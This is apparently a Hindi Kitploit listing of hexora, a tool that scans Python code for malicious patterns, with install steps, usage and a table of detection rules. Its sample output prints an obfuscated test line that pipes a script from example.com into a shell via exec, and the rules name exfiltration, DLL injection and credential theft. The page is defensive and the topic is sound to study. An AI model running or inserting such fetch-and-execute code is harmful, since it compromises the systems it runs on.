Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
hexora — दुर्भावनापूर्ण पायथन कोड का स्थैतिक विश्लेषण | Kitploit
उपकरण/GitHubGitHub/rushter/hexora
समझौता संकेतक (IOC) प्रबंधनस्थैतिक विश्लेषणभेद्यता विश्लेषणकोड विश्लेषणमालवेयर विश्लेषणआपूर्ति श्रृंखला सुरक्षामशीन लर्निंग
GitHubrushter/hexora

hexora

दुर्भावनापूर्ण पायथन कोड का स्थैतिक विश्लेषण

रिपॉजिटरी देखें
168813 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

hexora

PyPI - Version

Hexora एक स्थैतिक विश्लेषण उपकरण है जिसे Python कोड में दुर्भावनापूर्ण और हानिकारक पैटर्न का पता लगाने के लिए डिज़ाइन किया गया है। यह नियम-आधारित स्थैतिक विश्लेषण इंजन को एक मशीन-सीखे मॉडल के साथ जोड़ता है जो संपूर्ण स्रोत फ़ाइलों को स्कोर करता है ताकि उन्हें दुर्भावनापूर्ण या सुरक्षित के रूप में वर्गीकृत किया जा सके।

इसका उपयोग निम्नलिखित के लिए किया जा सकता है:

  • संभावित आपूर्ति श्रृंखला हमलों को पकड़ने के लिए प्रोजेक्ट निर्भरताओं का ऑडिट करना
  • Pastebin, GitHub, या खुले निर्देशिकाओं जैसे प्लेटफार्मों पर पाए जाने वाले दुर्भावनापूर्ण स्क्रिप्ट का पता लगाना
  • पिछले सुरक्षा घटनाओं से IoC फ़ाइलों का विश्लेषण करना
  • PyPi पर अपलोड किए गए नए पैकेजों का ऑडिट करना
Hexora का उदाहरण

उदाहरण

आउटपुट उदाहरणों के लिए, कृपया docs/examples.md फ़ाइल देखें।

स्थापना

Python का उपयोग करके

Python 3.9+ आवश्यक है।

root@kitploit:~
pip install hexora

uv का उपयोग करके:

root@kitploit:~
uv tool install hexora

उपयोग

root@kitploit:~
hexora --help

एकल फ़ाइल ऑडिट

root@kitploit:~
>  hexora audit test.py

warning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.
  ┌─ resources/test/test.py:3:8
  │
1 │ import pyperclip
2 │
3 │ data = pyperclip.paste()
  │        ^^^^^^^^^^^^^^^^^ HX2000
  │
  = Confidence: High
    Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.
    Machine learning based score for file: 0.93

warning[HX3000]: Possible execution of unwanted code
   ┌─ resources/test/test.py:20:1
   │
19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
20 │ _ceil("import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])")
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000
   │

निर्देशिका ऑडिट

root@kitploit:~
hexora audit --output-format terminal resources/test/

वर्चुअल एनवायरनमेंट से पैकेज ऑडिट

root@kitploit:~
hexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/

जहां python3.11 वर्चुअल एनवायरनमेंट में Python का संस्करण है।

सुझाव:

  • किसी दिए गए रन के लिए कुछ नियम कोड (जैसे, शोरगुल वाले आयात) को दबाने के लिए --exclude का उपयोग करें
  • केवल उच्च-आत्मविश्वास वाले निष्कर्षों पर ध्यान केंद्रित करने के लिए --min-confidence का उपयोग करें।

Confidence इंगित करता है कि कोड का एक निश्चित टुकड़ा कितना दुर्भावनापूर्ण है। कुछ लाइब्रेरी या कोड स्निपेट वैध उद्देश्यों के लिए उपयोग किए जाते हैं, और वैध उपयोग-मामलों को दुर्भावनापूर्ण से अलग करना कठिन है। यही कारण है कि कुछ मिलानों का आत्मविश्वास स्तर कम होता है।

कुछ नियमों के अलग-अलग आत्मविश्वास स्तर हो सकते हैं। जब तक आप बहुत आश्वस्त न हों, कोड द्वारा बहुत सारे नियमों को फ़िल्टर करने से बचें। उदाहरण के लिए, कोड और शेल निष्पादन में मध्यम, उच्च और बहुत उच्च आत्मविश्वास हो सकता है। यह इस बात पर निर्भर करता है कि कोड कैसे निष्पादित किया गया। यदि हम अस्पष्टता के प्रयास का पता लगाते हैं, तो हम आत्मविश्वास बढ़ाते हैं।

उदाहरण के लिए, इस कोड का उच्च आत्मविश्वास होगा:

root@kitploit:~
globals()["__builtins__"].eval("print(123)")

Python में उपयोग

root@kitploit:~
>>> import hexora
>>> results = hexora.audit_path("/Projects/hexora/resources/test/")
>>> len(results)
15
>>> results[0]
{'items': [{'confidence': 'low',
            'description': 'pyperclip can be used to copy and paste data from '
                           'the clipboard.',
            'label': 'pyperclip',
            'location': (7, 16),
            'rule': 'HX5010'},
           {'confidence': 'high',
            'description': 'Reading from the clipboard can be used to '
                           'exfiltrate sensitive data.',
            'label': 'pyperclip.paste',
            'location': (25, 42),
            'rule': 'HX2000'}],
 'path': '/Projects/hexora/resources/test/clipboard_01.py'}
>>> # Single file audit
>>> result = hexora.audit_file("/Projects/hexora/resources/test/clipboard_01.py")
>>> ...

दुर्भावनापूर्ण डेटासेट के विरुद्ध परीक्षण

नए नियम विकसित करते समय, आप मौजूदा दुर्भावनापूर्ण डेटासेट जैसे malicious-software-packages-dataset का उपयोग कर सकते हैं।

क्लोन करने के बाद, बेंचमार्किंग टूल को डेटासेट निर्देशिका पर इंगित करें:

root@kitploit:~
cargo run --release benchmark malicious-software-packages-dataset/samples/pypi/ --print-missing --exclude-path data/excluded.txt  --min-confidence high

उपलब्ध नियम

नए नियम नियमित रूप से जोड़े जाते हैं।

अभी, निम्नलिखित नियम उपलब्ध हैं:

क्रेडिट

पार्सिंग के लिए, हम ruff लाइब्रेरी से AST पार्सर का उपयोग करते हैं।

टूल डाउनलोड करें
कोडनामविवरण
HX1000AppEnumerationसंदिग्ध एप्लिकेशन गणना।
HX1010BrowserEnumerationसंदिग्ध ब्राउज़र गणना (ऐप्स, कुकीज़, इतिहास, आदि)।
HX1020PathEnumerationसंदिग्ध पथ गणना।
HX1030OSFingerprintसंदिग्ध OS फिंगरप्रिंटिंग।
HX2000ClipboardReadक्लिपबोर्ड से पढ़ना।
HX2010EnvAccessसंवेदनशील पर्यावरण चर तक पहुंच।
HX2020ScreenshotCaptureडिस्प्ले से स्क्रीनशॉट कैप्चर करना।
HX3000CodeExecसंभावित कोड निष्पादन।
HX3010ShellExecशेल कमांड का निष्पादन।
HX3040DLLInjectionसंभावित DLL इंजेक्शन।
HX3050DangerousExecशेल कमांड के अंदर संभावित रूप से खतरनाक कमांड का निष्पादन।
HX3060SuspiciousCallसंदिग्ध फ़ंक्शन कॉल।
HX4000ObfuscatedShellExecसंभावित रूप से अस्पष्ट शेल कमांड का निष्पादन।
HX4010ObfuscatedCodeExecसंभावित रूप से अस्पष्ट कोड का निष्पादन।
HX5000DunderImport__import__ का संदिग्ध उपयोग।
HX5010SuspiciousImportसंदिग्ध आयात।
HX5020CtypesImportसंदिग्ध ctypes आयात।
HX5030PickleImportसंदिग्ध pickle आयात।
HX5040StructImportसंदिग्ध struct आयात।
HX5050SocketImportसंदिग्ध socket आयात।
HX5060MarshalImportसंदिग्ध marshal आयात।
HX6000Base64Stringलंबा Base64-एन्कोडेड स्ट्रिंग पाया गया; संभावित कोड अस्पष्टता।
HX6010HexedLiteralsहेक्स-एन्कोडेड लिटरल की सूची पाई गई; संभावित पेलोड।
HX6020HexedStringलंबा हेक्स-एन्कोडेड स्ट्रिंग पाया गया; संभावित पेलोड।
HX6030IntLiteralsपूर्णांक लिटरल की बड़ी सूची पाई गई; संभावित कोड अस्पष्टता।
HX6040CVEInLiteralलिटरल में CVE पहचानकर्ता शामिल है।
HX6050SuspiciousLiteralसंदिग्ध लिटरल पाया गया; संभावित डेटा गणना।
HX6060PathTraversalसंदिग्ध पथ ट्रैवर्सल।
HX6070BrowserExtensionसंवेदनशील ब्राउज़र एक्सटेंशन की गणना।
HX6080WebHookसंदिग्ध वेबहुक पाया गया। संभावित डेटा बहिर्गमन।
HX6090TelegramTokenस्ट्रिंग लिटरल में Telegram बॉट टोकन पाया गया।
HX7000SuspiciousFunctionNameसंदिग्ध फ़ंक्शन नाम।
HX7010SuspiciousParameterNameसंदिग्ध पैरामीटर नाम।
HX7020SuspiciousVariableसंदिग्ध चर नाम।
HX9000DataExfiltrationसंभावित डेटा बहिर्गमन।
HX8000BinaryDownloadसंदिग्ध बाइनरी डाउनलोड।
HX8010BuiltinsVariableसंदिग्ध builtin चर उपयोग।
HX8020SuspiciousCommentसंदिग्ध टिप्पणी।
HX8030SuspiciousWriteफ़ाइल सिस्टम पर संदिग्ध लेखन।
HX8040InstallHookसंदिग्ध इंस्टॉल हुक सेटअप।